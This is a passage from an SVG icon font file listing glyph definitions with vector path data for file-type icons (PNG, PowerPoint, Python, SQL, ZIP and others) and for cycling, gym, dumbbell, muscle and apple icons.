<glyph glyph-name="file-png" horiz-adv-x="1000" unicode="&#xeb20;" d="M639 488c-6-1-90-1-93 1v91h-91v-92c-5-1-90-1-93 1v90c-4 1-89 1-91 0-1-4 0-89 0-92h91v-91h-91c-1-6 0-90 0-93h91v-91h-91c-1-4 0-81 0-92h92v91c2 0 87 1 91 0 1-2 1-83 0-91h93v91h91c1-2 1-81 1-91h90v92h-90v91h90v93h-90v91h90v93h-90v-92z m-185-184c-2 0-83-1-91 0-1 2-1 86 0 91h91v-91z m92-92c-2-1-86-1-91-1v92h91v-91z m-91 184v91h91c0-2 1-87 0-91h-91z m184-92h-92c-1 2-1 86 0 91h92v-91z m203 546h-666c-44 0-79-36-79-80v-840c0-44 35-80 79-80h647c44 0 80 36 80 80v859c0 34-27 61-61 61z m-7-556v-364c0-7-5-12-12-12h-647c-6 0-11 5-11 12v840c0 7 5 12 11 12h489c14 0 36-10 45-21l16-18c10-12 20-24 30-35 14-16 28-32 41-48l18-21c10-11 20-37 20-52v-293z" />
<glyph glyph-name="file-powerpoint" horiz-adv-x="1000" unicode="&#xeb21;" d="M842 850h-666c-44 0-79-36-79-80v-840c0-44 35-80 79-80h647c44 0 80 36 80 80v859c0 34-27 61-61 61z m-7-556v-364c0-7-5-12-12-12h-647c-6 0-11 5-11 12v840c0 7 5 12 11 12h489c14 0 36-10 45-21l16-18c10-12 20-24 30-35 14-16 28-32 41-48l18-21c10-11 20-37 20-52v-293z m-256 229c-23 11-48 16-77 16h-151v-378h91v128h58c46 0 83 11 109 33 26 23 40 52 40 89 0 25-7 47-19 67-12 19-29 34-51 45z m-37-150c-9-9-22-13-40-13h-60v109h61c16-1 29-6 39-16s14-25 14-43c0-16-5-28-14-37z" />
<glyph glyph-name="file-presentation" horiz-adv-x="1000" unicode="&#xeb22;" d="M735 604h-470c-4 0-6-2-6-6v-49c0-3 2-6 6-6h26c4 0 7-2 7-6v-291c0-3 2-6 6-6h158c4 0 6-2 6-5v-95c0-4-2-6-6-6h-40c-3 0-6-3-6-7v-26c0-2 3-5 6-5h156c3 0 6 3 6 5v26c0 4-3 7-6 7h-40c-4 0-6 2-6 6v95c0 3 2 6 6 6h158c4 0 7 2 7 6v291c0 3 2 6 5 6h27c4 0 6 3 6 6v48c0 4-3 6-6 6z m-370-121c0 2 3 5 6 5h83c4 0 6-3 6-5v-86c0-4-2-6-6-6h-83c-3 0-6 2-6 6v86z m269-150c0-3-3-6-6-6h-257c-3 0-6 3-6 6v22c0 3 3 6 6 6h257c3 0 6-3 6-6v-22z m0 64c0-4-3-6-6-6h-127c-3 0-6 2-6 6v21c0 3 3 6 6 6h127c3 0 6-3 6-6v-21z m0 63c0-3-3-6-6-6h-127c-3 0-6 3-6 6v22c0 3 3 6 6 6h127c3 0 6-3 6-6v-22z m208 390h-666c-44 0-79-36-79-80v-840c0-44 35-80 79-80h647c44 0 80 36 80 80v859c0 34-27 61-61 61z m-7-556v-364c0-7-5-12-12-12h-647c-6 0-11 5-11 12v840c0 7 5 12 11 12h489c14 0 36-10 45-21l16-18c10-12 20-24 30-35 14-16 28-32 41-48l18-21c10-11 20-37 20-52v-293z" />
<glyph glyph-name="file-psb" horiz-adv-x="1000" unicode="&#xeb23;" d="M500 551l-262-94 261-95 1-1 262 96-261 94h-1z m0-261l-102 37-74-27 175-63 1-1 176 64-74 27-102-37z m0-87l-102 36-74-26 175-64h1l176 64-74 26-102-36z m342 647h-666c-44 0-79-36-79-80v-840c0-44 35-80 79-80h647c44 0 80 36 80 80v859c0 34-27 61-61 61z m-7-556v-364c0-7-5-12-12-12h-647c-6 0-11 5-11 12v840c0 7 5 12 11 12h489c14 0 36-10 45-21l16-18c10-12 20-24 30-35 14-16 28-32 41-48l18-21c10-11 20-37 20-52v-293z" />
<glyph glyph-name="file-psd" horiz-adv-x="1000" unicode="&#xeb24;" d="M499 571l-258-94 258-93 260 93-258 94h-2z m0-235l-150 55-108-39 259-94 259 94-108 39-152-55z m0-128l-150 54-108-39 259-94 259 94-108 39-152-54z m343 642h-666c-44 0-79-36-79-80v-840c0-44 35-80 79-80h647c44 0 80 36 80 80v859c0 34-27 61-61 61z m-7-556v-364c0-7-5-12-12-12h-647c-6 0-11 5-11 12v840c0 7 5 12 11 12h489c14 0 36-10 45-21l16-18c10-12 20-24 30-35 14-16 28-32 41-48l18-21c10-11 20-37 20-52v-293z" />
<glyph glyph-name="file-python" horiz-adv-x="1000" unicode="&#xeb25;" d="M440 359h119c32 0 59 27 59 60v113c0 32-27 56-59 61-21 4-42 5-62 5-20 0-40-2-57-5-50-9-59-27-59-61v-45h118v-15h-162c-35 0-65-21-74-60-11-45-12-74 0-121 8-35 28-60 63-60h40v54c0 39 34 74 74 74z m-7 158c-12 0-22 10-22 22 0 13 10 23 22 23s22-11 22-23c0-12-10-22-22-22z m244-45h-45v-53c0-41-34-75-73-75h-119c-32 0-59-28-59-60v-113c0-32 28-51 59-60 38-11 74-13 119 0 29 9 59 26 59 60v45h-118v15h177c34 0 47 24 59 60 12 37 12 73 0 121-8 34-25 60-59 60z m-111-286c12 0 22-10 22-22s-10-23-22-23-22 10-22 23c0 12 10 22 22 22z m276 664h-666c-44 0-79-36-79-80v-840c0-44 35-80 79-80h647c44 0 80 36 80 80v859c0 34-27 61-61 61z m-7-556v-364c0-7-5-12-12-12h-647c-6 0-11 5-11 12v840c0 7 5 12 11 12h489c14 0 36-10 45-21l16-18c10-12 20-24 30-35 14-16 28-32 41-48l18-21c10-11 20-37 20-52v-293z" />
<glyph glyph-name="file-ruby" horiz-adv-x="1000" unicode="&#xeb26;" d="M594 393c-1 4-5 4-8 1l-131-136c-3-3-2-6 1-8 84-36 167-72 252-109 4-1 5 0 4 4-40 84-79 166-118 248z m-152-157c-3 1-8 0-11-3-35-36-69-72-105-109-3-3-2-5 2-5 125 0 249 1 372 1 4 0 7 0 7 1 0 0-3 2-6 3l-259 112z m278 290c0 4-1 6-3 4-1-1-2-2-3-3-35-36-69-72-104-107-4-5-4-8-2-13 35-73 69-145 103-218 6-12 12-24 18-37 2-3 3-6 3-6 1 0 1 4 1 7-5 124-9 248-13 373z m-312-85c-4 0-6-2-6-6 12-53 24-106 36-159 0-4 3-4 6-2 42 44 83 87 126 131 2 3 1 5-2 6-54 10-107 20-160 30z m3-192c-47 20-92 40-139 60-4 2-6 0-5-4 12-56 25-112 37-168 1-3 4-4 6-1l102 106c3 2 2 6-1 7z m182 190c2-4 5-4 8-2 34 36 68 71 102 106 3 3 2 6-2 7-56 10-112 20-169 31-3 0-5-2-4-5 23-47 44-92 65-137z m-22-9c4-1 5 1 4 4-22 46-43 91-65 136-1 4-5 4-7 1-34-35-67-69-101-104-3-3-2-6 2-7 56-10 111-20 167-30z m-157-162c4-1 6 1 5 4-12 56-24 111-36 167-1 3-4 4-7 1-34-35-67-69-101-104-2-3-2-7 2-8 45-20 91-40 137-60z m428 582h-666c-44 0-79-36-79-80v-840c0-44 35-80 79-80h647c44 0 80 36 80 80v859c0 34-27 61-61 61z m-7-556v-364c0-7-5-12-12-12h-647c-6 0-11 5-11 12v840c0 7 5 12 11 12h489c14 0 36-10 45-21l16-18c10-12 20-24 30-35 14-16 28-32 41-48l18-21c10-11 20-37 20-52v-293z" />
<glyph glyph-name="file-spreadsheet" horiz-adv-x="1000" unicode="&#xeb27;" d="M255 126h490v448h-490v-448z m337 416h120v-71h-120v71z m0-104h120v-71h-120v71z m-152 104h120v-71h-120v71z m0-104h120v-71h-120v71z m0-104h272v-176h-18v122h-66v-122h-19v87h-66v-87h-19v53h-66v-53h-18l0 176z m-153 208h120v-71h-120v71z m0-104h120v-71h-120v71z m0-104h120v-72h-120v72z m0-104h120v-72h-120v72z m555 620h-666c-44 0-79-36-79-80v-840c0-44 35-80 79-80h647c44 0 80 36 80 80v859c0 34-27 61-61 61z m-7-556v-364c0-7-5-12-12-12h-647c-6 0-11 5-11 12v840c0 7 5 12 11 12h489c14 0 36-10 45-21l16-18c10-12 20-24 30-35 14-16 28-32 41-48l18-21c10-11 20-37 20-52v-293z" />
<glyph glyph-name="file-sql" horiz-adv-x="1000" unicode="&#xeb28;" d="M500 389c114 0 206 34 206 77v62c0 43-92 77-206 77-114 0-206-34-206-77v-62c0-43 92-77 206-77z m0-37c-109 0-198 32-206 71-1-2 0-104 0-104 0-42 92-76 206-76s206 34 206 76c0 0 0 102 0 104-8-39-97-71-206-71z m0-148c-109 0-198 32-206 71v-103c0-43 92-77 206-77s206 34 206 77l0 103c-8-39-97-71-206-71z m342 646h-666c-44 0-79-36-79-80v-840c0-44 35-80 79-80h647c44 0 80 36 80 80v859c0 34-27 61-61 61z m-7-556v-364c0-7-5-12-12-12h-647c-6 0-11 5-11 12v840c0 7 5 12 11 12h489c14 0 36-10 45-21l16-18c10-12 20-24 30-35 14-16 28-32 41-48l18-21c10-11 20-37 20-52v-293z" />
<glyph glyph-name="file-svg" horiz-adv-x="1000" unicode="&#xeb29;" d="M730 356l-42 96c11 8 16 22 11 34-7 15-25 22-41 14-7-3-12-8-16-13l-110 22c0 4-1 8-2 12-7 15-25 21-41 14-9-5-16-12-18-22-24-1-58-7-91-22-18-8-33-18-46-29l31 69c3 0 7 0 11 2 10 4 15 15 11 25-4 10-16 13-27 8-10-4-15-15-11-25 1-3 4-5 7-7l-36-81c-7 1-14 0-20-3-16-7-24-24-18-39 3-6 7-10 13-13l-36-79c-3 0-8 0-12-2-11-4-15-16-11-25 4-10 15-13 26-9 11 5 15 16 11 26-1 2-3 4-5 6l32 72c21-81 190-188 252-224-1-5 0-11 2-15 6-14 24-21 41-14 16 8 24 26 17 40-1 3-2 5-5 7l112 120c7-4 17-4 26 0 16 7 24 25 18 39-5 13-19 19-33 16z m-26-42l3-4-112-121c-8 3-16 2-24-1-5-3-9-7-13-11-83 50-231 152-243 218 3 1 6 1 8 2 16 8 24 25 18 40-1 2-3 5-5 7 14 13 30 24 50 33 30 14 62 20 84 21l1-3c7-15 25-21 41-13 7 2 12 7 15 13l111-23c0-4 1-8 2-11 5-13 19-19 33-16l42-96c-11-8-16-23-11-35z m138 536h-666c-44 0-79-36-79-80v-840c0-44 35-80 79-80h647c44 0 80 36 80 80v859c0 34-27 61-61 61z m-7-556v-364c0-7-5-12-12-12h-647c-6 0-11 5-11 12v840c0 7 5 12 11 12h489c14 0 36-10 45-21l16-18c10-12 20-24 30-35 14-16 28-32 41-48l18-21c10-11 20-37 20-52v-293z" />
<glyph glyph-name="file-text" horiz-adv-x="1000" unicode="&#xeb2a;" d="M311 487h378c24 0 44 20 44 45 0 26-20 46-44 46h-378c-24 0-44-20-44-46 0-25 20-45 44-45z m378-89h-378c-25 0-45-20-45-45s20-46 45-46h378c24 0 44 21 44 46s-20 45-44 45z m-1-187h-377c-24 0-44-20-44-44s20-45 44-45h377c25 0 45 20 45 45s-20 44-45 44z m154 639h-666c-44 0-79-36-79-80v-840c0-44 35-80 79-80h647c44 0 80 36 80 80v859c0 34-27 61-61 61z m-7-556v-364c0-7-5-12-12-12h-647c-6 0-11 5-11 12v840c0 7 5 12 11 12h489c14 0 36-10 45-21l16-18c10-12 20-24 30-35 14-16 28-32 41-48l18-21c10-11 20-37 20-52v-293z" />
<glyph glyph-name="file-tiff" horiz-adv-x="1000" unicode="&#xeb2b;" d="M612 310c19 0 33 15 34 33 0 19-15 35-34 35-19 0-35-15-35-35 1-18 16-33 35-33z m-1 259l-372-156 120-282h401v306h-94l-55 132z m-252-390l-96 226 337 141 46-109h-287v-258z m383-16l-61 77c-5 7-15 7-20-1-3-4-6-9-9-12-5-8-14-9-20-2-13 15-26 30-38 44-6 7-16 7-22 0l-19-23c-5-7-15-9-20-4-5 4-12 4-15 0-4-5-9-3-13 3-3 4-5 9-7 12-2 3-5 5-5 5l-1-2c-12-23-25-47-37-70-2-4-3-4-7-4-13 4-27 4-40 0-14-3-24-10-31-23v257h365v-257z m100 687h-666c-44 0-79-36-79-80v-840c0-44 35-80 79-80h647c44 0 80 36 80 80v859c0 34-27 61-61 61z m-7-556v-364c0-7-5-12-12-12h-647c-6 0-11 5-11 12v840c0 7 5 12 11 12h489c14 0 36-10 45-21l16-18c10-12 20-24 30-35 14-16 28-32 41-48l18-21c10-11 20-37 20-52v-293z" />
<glyph glyph-name="file-video" horiz-adv-x="1000" unicode="&#xeb2c;" d="M380 388c69-1 139-1 208-1 6 0 7 1 5 7-3 15-16 24-33 24-31 1-63 0-95 0-60 0-121 0-182 1-11 0-21-4-28-14-3-3-5-7-5-11v-225l0-5c0 0 0 0 0 0 5-15 16-22 32-22h281c17 0 31 13 31 30 0 60 0 120 0 180 0 4-1 5-6 5-54 0-109 0-164 0-15 0-30 0-45 0-3 0-5 1-4 5 0 6 0 13 0 20-1 5 1 6 5 6z m108-78c33 0 61-27 62-58 2-36-27-63-60-64-36-1-63 27-64 58-2 34 26 64 62 64z m-145-107c-17 0-31 14-31 31 1 17 15 31 32 31 17-1 31-15 30-31 0-17-14-31-31-31z m383 228l-2-1c-25-18-50-36-74-55-16-12-25-29-25-49 0-30 0-60 0-90 0-22 9-39 27-53 23-18 47-35 71-53 3-2 6-4 9-5 8-2 14-1 17 6 0 1 1 2 1 4v290c0 11-13 14-24 6z m-233 19c34 1 63 29 62 66-1 32-30 60-64 60-38 0-66-31-65-66 2-32 30-62 67-60z m-155 0c27 1 51 23 50 52-1 26-24 48-52 48-29 0-52-24-51-52 1-26 24-49 53-48z m504 400h-666c-44 0-79-36-79-80v-840c0-44 35-80 79-80h647c44 0 80 36 80 80v859c0 34-27 61-61 61z m-7-556v-364c0-7-5-12-12-12h-647c-6 0-11 5-11 12v840c0 7 5 12 11 12h489c14 0 36-10 45-21l16-18c10-12 20-24 30-35 14-16 28-32 41-48l18-21c10-11 20-37 20-52v-293z" />
<glyph glyph-name="file-wave" horiz-adv-x="1000" unicode="&#xeb2d;" d="M526 591c-16 0-16 0-16-16v-453c0-4 0-9 0-13h47c0 5 0 11 0 16v436c0 30 0 30-31 30z m-45-87c-8 0-16 0-24 0-10 1-14-3-13-14 0-46 0-93 0-140 0-48 0-95 0-142 0-9 3-13 12-13 7 1 13 0 20 0 15 1 15 1 15 16v278c0 1 0 3 0 5 1 7-3 10-10 10z m142-33c0 33 0 33-33 33-14 0-14 0-14-15v-279c0-2 0-3 0-5 0-7 3-9 9-9 8 0 17 0 25 0 11-1 13 3 13 13 0 47 0 94 0 141v121z m-266-43c0 33 0 32-33 33-11 0-14-4-14-15 1-47 0-93 0-140 0-18 1-36 0-55 0-8 3-12 12-12 8 1 16 1 23 0 10-1 13 4 13 13-1 32-1 64-1 97 0 26 0 53 0 79z m321 11c-9-1-18-1-27 0-7 0-9-3-9-10 0-12 0-23 0-35 0-40 0-81 0-121-1-9 2-13 12-12 8 0 16 0 24 0 8-1 11 3 11 11 0 26 0 51 0 77 0 26 0 52 0 78 0 9-3 12-11 12z m-386-33c0 8-3 11-10 11-10 0-19 0-28 0-6 0-9-3-9-9v-116c0-7 3-9 9-9 9 0 18 0 27 0 8-1 11 3 11 11-1 19 0 37 0 56-1 19-1 38 0 56z m121 11c-8-1-16-1-24 0-9 0-11-3-11-12 0-37 0-74 0-111 0-8 2-12 11-11 8 0 17 0 25 0 8-1 11 3 11 11 0 18 0 37 0 55s0 37 0 56c0 8-3 13-12 12z m342-10c0 6-2 10-9 10-10 0-20 0-30 0-5 0-8-3-8-8 0-39 0-78 0-118 0-5 3-8 9-8 9 0 18 0 27 0 8-1 11 3 11 11 0 18 0 37 0 56 0 19 0 38 0 57z m87 443h-666c-44 0-79-36-79-80v-840c0-44 35-80 79-80h647c44 0 80 36 80 80v859c0 34-27 61-61 61z m-7-556v-364c0-7-5-12-12-12h-647c-6 0-11 5-11 12v840c0 7 5 12 11 12h489c14 0 36-10 45-21l16-18c10-12 20-24 30-35 14-16 28-32 41-48l18-21c10-11 20-37 20-52v-293z" />
<glyph glyph-name="file-wmv" horiz-adv-x="1000" unicode="&#xeb2e;" d="M313 277c-14 36-18 74-10 113 15 83 84 148 168 160 3 0 5 1 5 5-1 11-1 23-1 34 0 11 0 11-10 9-59-8-109-34-149-78-28-30-47-65-58-104-4-17-17-78 6-147 2-5 4-11 6-16 2-4 3-5 7-3 11 7 22 14 34 20 3 2 4 3 2 7z m363 250c-12 12-59 54-129 69-6 1-12 2-18 3-4 1-5 0-5-5 0-13 0-26 0-39 0-3 0-5 4-6 39-5 73-21 103-47 64-55 86-148 54-226-2-3-1-5 2-7 10-5 20-11 30-17 9-5 9-5 13 4 22 55 25 112 8 168-12 40-33 74-62 103z m-12-300c-3 2-5 2-8-1-24-31-55-53-92-66-80-27-171 0-223 67-2 3-3 4-7 2-9-6-20-11-30-17-9-5-9-5-2-13 36-48 83-78 141-92 41-9 81-8 120 2 17 5 76 24 124 77 4 4 8 9 12 14 3 3 3 5-1 7-12 6-23 13-34 20z m-322 124c0-91 76-156 158-155 80-1 157 63 157 155 0 91-75 154-155 156-83 1-160-64-160-156z m113 81c45-28 90-55 135-83-45-27-89-55-135-83v166z m387 418h-666c-44 0-79-36-79-80v-840c0-44 35-80 79-80h647c44 0 80 36 80 80v859c0 34-27 61-61 61z m-7-556v-364c0-7-5-12-12-12h-647c-6 0-11 5-11 12v840c0 7 5 12 11 12h489c14 0 36-10 45-21l16-18c10-12 20-24 30-35 14-16 28-32 41-48l18-21c10-11 20-37 20-52v-293z" />
<glyph glyph-name="file-word" horiz-adv-x="1000" unicode="&#xeb2f;" d="M842 850h-666c-44 0-79-36-79-80v-840c0-44 35-80 79-80h647c44 0 80 36 80 80v859c0 34-27 61-61 61z m-7-556v-364c0-7-5-12-12-12h-647c-6 0-11 5-11 12v840c0 7 5 12 11 12h489c14 0 36-10 45-21l16-18c10-12 20-24 30-35 14-16 28-32 41-48l18-21c10-11 20-37 20-52v-293z m-244 8l-53 237h-77l-52-237-43 237h-91l81-378h94l49 216 51-216h94l81 378h-91l-43-237z" />
<glyph glyph-name="file-zip" horiz-adv-x="1000" unicode="&#xeb30;" d="M623 572h-95v-22h-22v-22h22v-22h-22v-22h22v-22h-22v-22h22v-22h-22v-23h22v-22h-22v-22h22v-22h-22v-44c24-7 44-29 44-56 0-31-25-55-55-55-32 0-56 24-56 55 0 29 20 51 44 56v22h-22v22h22v22h-22v22h22v22h-22v23h22v22h-22v22h22v22h-22v22h22v22h-22v22h22v22h-107c-55 0-99-44-99-99v-246c0-55 44-99 99-99h247c55 0 100 44 100 99v246c0 55-45 99-100 99z m-147-315c-2-2-4-3-5-5-1-1-3-2-4-4 0 0 0 0 0-1-2-1-3-3-3-5-1-2-2-4-2-6-1-2-1-5-1-7 0-2 0-4 1-6 0-1 0-1 0-2 0-1 1-3 2-4 0-2 1-4 3-6 0 0 0 0 0 0 1-2 2-3 4-4 3-4 7-7 11-8 2-1 4-2 5-2 1 0 1 0 1 0 2-1 4-1 6-1s5 0 7 1c0 0 0 0 1 0 1 0 3 1 4 2 5 1 9 4 12 8 1 1 2 2 4 4 1 2 2 4 3 6 2 4 3 8 3 12 0 3 0 5-1 7 0 2-1 4-2 6-1 2-2 3-3 5 0 0 0 1 0 1-2 2-3 3-4 4-2 2-3 3-5 4-2 1-3 2-4 3-2 1-3 1-5 2-1 0-3 1-5 1-1 0-3 0-5 0s-3 0-5 0-3-1-4-1c-2-1-3-1-5-2-1-1-3-1-4-2z m366 593h-666c-44 0-79-36-79-80v-840c0-44 35-80 79-80h647c44 0 80 36 80 80v859c0 34-27 61-61 61z m-7-556v-364c0-7-5-12-12-12h-647c-6 0-11 5-11 12v840c0 7 5 12 11 12h489c14 0 36-10 45-21l16-18c10-12 20-24 30-35 14-16 28-32 41-48l18-21c10-11 20-37 20-52v-293z" />
<glyph glyph-name="cycling-alt" horiz-adv-x="1000" unicode="&#xeb31;" d="M587 850c8-6 17-13 26-19 35-29 51-65 33-110-17-43-50-65-96-61-47 3-76 33-85 77-10 47 13 80 53 103 6 4 14 7 21 10l48 0z m-259-436c7-5 11-9 15-10 109-23 159-100 186-200 7-29 22-56 33-85 10-26 17-56-15-70-34-15-50 13-62 37-26 50-49 101-72 152-11 27-29 43-58 51-50 14-101 31-149 50-60 25-77 74-42 128 49 73 107 139 168 203 24 25 52 28 83 14 108-48 216-95 324-143 21-10 36-25 27-49-10-25-30-30-55-22-77 26-155 50-232 77-21 7-36 6-51-11-33-41-66-81-100-122z m-135-181c104 0 192-89 191-193s-90-192-195-190c-102 2-188 89-188 191-1 105 87 193 192 192z m115-192c1 63-51 116-114 117-64 1-117-50-118-113-1-66 51-120 117-120 63 1 115 52 115 116z m692 157c1-104-86-193-191-194-104-1-193 87-193 192 0 102 86 189 188 191 105 2 194-85 196-189z m-76-2c1 62-52 115-115 116-63 0-116-51-117-114-1-66 52-119 117-118 64 0 115 52 115 116z m-885 368c4 29 17 54 38 75 47 50 102 81 173 75 22-1 35-9 16-32-49-60-98-121-148-181-8-10-16-20-31-10-27 18-47 39-48 73z" />
<glyph glyph-name="cycling" horiz-adv-x="1000" unicode="&#xeb32;" d="M797 296c-1 0-3 0-4-1l-14 115c-1 6-4 11-7 16 0 1-2 2-2 2-4 5-10 8-16 8l-213 107 24 34-101 73-216-300 30-22h-46v-35c-9 2-19 3-29 3-112 0-203-91-203-204 0-112 91-203 203-203 113 0 204 91 204 203 0 12-2 24-3 35l77 32v-152h92v191l72 29c-32-36-52-83-52-135 0-112 91-203 204-203 112 0 203 91 203 203 0 113-91 204-203 204z m-301 184l234-118h-319l85 118z m222-168l-158-66-84 66h242z m-412-25l-8-15c-12 6-24 11-37 15h45z m64-195c0-91-75-166-167-166-91 0-166 75-166 166 0 92 75 167 166 167 27 0 53-7 75-19l-90-153c0-1 0-1 0-2-1-1-1-3-2-4 0-2-1-4-1-5 0-2 0-3 1-5 0-1 0-3 1-5 0 0 0-1 0-2 0-1 1-1 2-2 0-1 1-3 3-4 1-1 2-2 3-3 1-1 2-2 2-2 1-1 2-1 2-1 2-1 3-1 5-2 2 0 3 0 5 0 1-1 3 0 4 0 2 0 4 0 5 1 1 0 2 0 2 0l148 61c1-6 2-13 2-20z m-16 69l-84-35 50 85c14-14 26-31 34-50z m-15 83l16 28 93-72-59-25c-12 27-29 50-50 69z m458-318c-92 0-167 75-167 166 0 74 49 136 116 158l20-157c2-17 15-29 30-27 14 1 24 16 22 33l-20 160c91-1 165-75 165-167 0-91-75-166-166-166z m-232 690c54 0 98 43 98 98 0 54-44 98-98 98-54 0-98-44-98-98 0-55 44-98 98-98z m22-616h-92c-15 0-28-13-28-28 0-15 13-28 28-28h92c15 0 28 13 28 28 0 15-13 28-28 28z" />
<glyph glyph-name="dumbbell" horiz-adv-x="1000" unicode="&#xeb33;" d="M55 524c-31 0-55-26-55-59v-244c0-33 24-59 55-59s54 26 54 59v244c0 33-24 59-54 59z m756 50c-30 0-54-26-54-59v-127h-513v113c0 32-25 59-55 59-30 0-55-27-55-59v-316c0-33 25-59 55-59 30 0 55 26 55 59v141h513v-127c0-33 24-59 54-59 30 0 55 26 55 59v316c0 33-25 59-55 59z m134-36c-30 0-54-26-54-59v-244c0-33 24-59 54-59 31 0 55 26 55 59v244c0 33-24 59-55 59z" />
<glyph glyph-name="dumbbells" horiz-adv-x="1000" unicode="&#xeb34;" d="M252 348h40c9 0 16 7 16 17v208c0 9-7 16-16 16h-40c-9 0-17-7-17-16v-208c0-10 8-17 17-17z m642 251h-40c-9 0-16-7-16-16v-67c0-9-8-17-17-17h-407c-9 0-17 8-17 17v57c0 9-7 16-16 16h-40c-9 0-16-7-16-16v-208c0-10 7-17 16-17h40c9 0 16 7 16 17v76c0 9 8 17 17 17h407c9 0 17-8 17-17v-67c0-9 7-16 16-16h40c9 0 17 7 17 16v209c0 9-8 16-17 16z m90 0h-40c-9 0-17-7-17-16v-209c0-9 8-16 17-16h40c9 0 16 7 16 16v209c0 9-7 16-16 16z m-928-257l-40 0c-9 0-16-7-16-17l2-208c0-9 7-16 17-16l39 0c10 0 17 7 17 17l-2 208c0 9-8 16-17 16z m603 15l-40 0c-9 0-17-7-17-17l1-67c0-9-7-16-16-16l-408-4c-9 0-16 7-16 16l-1 58c0 9-7 16-16 16l-40 0c-9 0-17-8-16-17l1-208c0-9 8-17 17-17l40 1c9 0 16 7 16 16l-1 77c0 9 8 16 17 17l407 3c9 0 17-7 17-16l0-67c0-9 8-16 17-16l40 0c9 0 16 7 16 17l-2 208c0 9-7 16-16 16z m89 1l-40 0c-9 0-16-8-16-17l2-208c0-9 7-17 16-17l40 1c9 0 17 7 17 16l-2 209c0 9-8 16-17 16z" />
<glyph glyph-name="gym-alt-1" horiz-adv-x="1000" unicode="&#xeb35;" d="M508 673c48 0 88 40 88 89s-40 88-88 88c-49 0-89-39-89-88 0-49 40-89 89-89z m142-355l64-71 21 20-64 70-21-19z m174 162l26-29-36-33-154 212c-6 8-14 13-22 14 0 1-271 1-271 1-7-4-13-8-18-15l-156-215-40 35 23 27-21 19-63-71 21-19 29 32 43-38c-4-14 1-30 13-38 11-8 24-9 35-4l39-35-26-29 22-19 62 71-21 19-26-29-37 32 2 1 135 187 7-45 0-611c0-28 23-50 50-50 28 0 51 22 51 50v409h22v-409c1-28 23-50 51-50 27 0 50 22 50 50v611l9 50 138-191-40-35-23 26-22-19 64-71 22 19-29 32 40 37c12-6 26-6 38 3 13 9 18 27 11 42l39 35 27-29 21 19-64 71-21-20z m-210 51v3c0 0 0-3 0-3z m257-8l-21-19 64-70 21 19-64 70z m-743-4l-62-71 21-19 63 71-22 19z m145-249l21-19 63 72-21 19-63-72z" />
<glyph glyph-name="gym-alt-2" horiz-adv-x="1000" unicode="&#xeb36;" d="M500 601c41 0 75 34 75 75 0 41-34 75-75 75-41 0-75-34-75-75 0-41 34-75 75-75z m-500-263h73v-241h-73v241z m843-75h-7c-39 62-198 314-198 314h-285s-141-216-188-287l-3 72h-73v-288h73v132h123v-214c0-24 19-43 43-43 23 0 43 19 43 43l0 214h249v-214c0-24 19-43 42-43 24 0 43 19 43 43v214h133v-123h73v288h-73l5-108z m-291 0h-109l57 24 52-24z m-316 0c43 66 164 250 164 250l0-174-115-29v-47h-49z m354 76l0 174c0 0 132-186 177-250h-62v47l-115 29z m338 8h72v-240h-72v240z" />
<glyph glyph-name="gym-alt-3" horiz-adv-x="1000" unicode="&#xeb37;" d="M518 665c47 0 86 38 86 86 0 47-39 86-86 86-48 0-86-39-86-86 0-48 38-86 86-86z m-518-472l3-315 95 1-3 315z m786 20l1-130-166-2 0 425 210 216c15 15 15 38 1 52-14 14-37 14-52 0 0 0-136-137-136-137h-263l-136 137c-14 14-37 14-51 0-14-14-14-37 0-51 0-1 210-216 210-216l-1-428-190-2-1 118-95-1 2-315 95 1-1 143 190 2 0-113c0-27 22-49 49-49 27 0 49 22 49 49l0 114 22 0v-114c1-27 23-49 49-49 27 0 49 22 49 49v115l166 1 1-130 95 1-3 315-94-1z m-165 316c1 0 0-3 0-3v3z m-120-449l0 230h22v-230l-22 0z m496 135l-95-1 3-315 95 1z" />
<glyph glyph-name="gym" horiz-adv-x="1000" unicode="&#xeb38;" d="M493 628c46 0 84 38 84 84 0 46-38 83-84 83-46 0-83-37-83-83 0-46 37-84 83-84z m-417 16l64-63 19 20-64 63-19-20z m261 143l-64 63-19-19 64-63 19 19z m318-9l63 65 20-19-63-65-20 19z m226-90l-26-27-47 46c1 10-2 20-10 28-7 7-18 10-28 9l-32 32 24 24-20 19-63-64 20-19 28 29 27-26c-2-1-4-3-5-4-1-1-132-134-132-134h-257l-129 131 37 38 27-26 19 19-65 63-19-19 27-26-39-40c-13 6-29 4-39-7-11-10-13-27-7-40l-30-30-24 23-19-19 64-63 19 19-29 29 28 29 202-207-1-577c0-27 22-48 48-48 26 0 47 21 47 48v386h22v-387c0-26 21-47 47-47 27 0 48 21 48 47l0 577 204 210c2 3 4 5 5 7l41-41-26-26 19-19 63 64-19 19z m-287-194v3c0 0 0-3 0-3z m248 106l63 64 19-19-63-64-19 19z" />
<glyph glyph-name="muscle-weight" horiz-adv-x="1000" unicode="&#xeb39;" d="M927 223c-3 10-8 18-15 26-11 45-33 97-66 149-52 83-189 216-241 237-3 1-5 2-7 2-2 13-9 25-27 33-27 13-53 25-78 34-30 85-111 146-206 146-121 0-219-98-219-219s98-218 219-218c99 0 183 66 210 157 19 3 37 2 46-12 27-40 57-173 106-258-13 2-26 3-39 3-56 0-107-17-143-44-31 49-85 80-146 80-81 0-149-55-168-131l-8 0 5-358 88 1 32 57c56 22 122 77 168 136 62-9 141-14 172-14 34 0 164 15 201 28 86 32 138 106 116 165z m-640 344c-36 0-64 29-64 64 0 36 28 64 64 64 35 0 64-28 64-64s-29-64-64-64z" />
<glyph glyph-name="muscle" horiz-adv-x="1000" unicode="&#xeb3a;" d="M949 282c-4 11-10 20-17 29-13 52-39 113-77 172-60 96-219 251-279 275-3 1-6 1-8 2-2 15-11 29-30 38-71 33-139 66-187 46-48-20-74-50-23-166 49-36 146 36 177-10 31-46 65-199 122-298-14 2-29 3-44 3-66 0-125-19-166-49-36 55-98 92-169 92-94 0-173-65-194-152l-9 0 5-414 102 2 38 65c64 25 140 89 193 157 72-10 163-16 200-16 39 0 189 17 231 33 100 36 160 122 135 191z" />
<glyph glyph-name="apple" horiz-adv-x="1000" unicode="&#xeb3b;" d="M520 534c15 26 39 63 70 98 26 30 77 68 77 68 8 6 7 14-2 18l-61 29c-9 4-21 1-27-7 0 0-45-65-99-205-166 75-323-30-323-212 0-191 146-481 345-394 209-90 346 203 346 394 0 184-142 292-326 211z m-38 62c10 1 19 9 19 19 0 0 6 74-45 126-53 53-127 46-127 46-10-1-18-9-19-19 0 0-6-74 46-126 52-52 126-46 126-46z" />
